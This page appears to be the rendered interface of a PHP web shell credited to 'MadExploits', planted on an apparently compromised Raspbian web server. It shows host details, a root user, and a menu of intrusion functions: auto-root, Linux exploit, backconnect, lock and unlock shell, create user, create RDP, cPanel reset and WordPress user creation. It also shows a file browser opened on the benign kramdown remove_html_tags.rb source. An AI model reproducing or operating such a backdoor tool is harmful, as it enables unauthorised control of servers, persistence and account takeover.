Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
kramdown /
converter /
[ HOME SHELL ]
Name
Size
Permission
Action
math_engine
[ DIR ]
drwxr-xr-x
syntax_highlighter
[ DIR ]
drwxr-xr-x
base.rb
10.06
KB
-rw-r--r--
hash_ast.rb
837
B
-rw-r--r--
html.rb
17.41
KB
-rw-r--r--
kramdown.rb
14.32
KB
-rw-r--r--
latex.rb
19.19
KB
-rw-r--r--
man.rb
8.89
KB
-rw-r--r--
pdf.rb
18.49
KB
-rw-r--r--
remove_html_tags.rb
1.64
KB
-rw-r--r--
syntax_highlighter.rb
2.06
KB
-rw-r--r--
toc.rb
1.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : remove_html_tags.rb
# -*- coding: utf-8 -*- # #-- # Copyright (C) 2009-2016 Thomas Leitner <t_leitner@gmx.at> # # This file is part of kramdown which is licensed under the MIT. #++ # require 'kramdown/converter' module Kramdown module Converter # Removes all block (and optionally span) level HTML tags from the element tree. # # This converter can be used on parsed HTML documents to get an element tree that will only # contain native kramdown elements. # # *Note* that the returned element tree may not be fully conformant (i.e. the content models of # *some elements may be violated)! # # This converter modifies the given tree in-place and returns it. class RemoveHtmlTags < Base def initialize(root, options) super @options[:template] = '' end def convert(el) real_el, el = el, el.value if el.type == :footnote children = el.children.dup index = 0 while index < children.length if [:xml_pi].include?(children[index].type) || (children[index].type == :html_element && %w[style script].include?(children[index].value)) children[index..index] = [] elsif children[index].type == :html_element && ((@options[:remove_block_html_tags] && children[index].options[:category] == :block) || (@options[:remove_span_html_tags] && children[index].options[:category] == :span)) children[index..index] = children[index].children else convert(children[index]) index += 1 end end el.children = children real_el || el end end end end
Close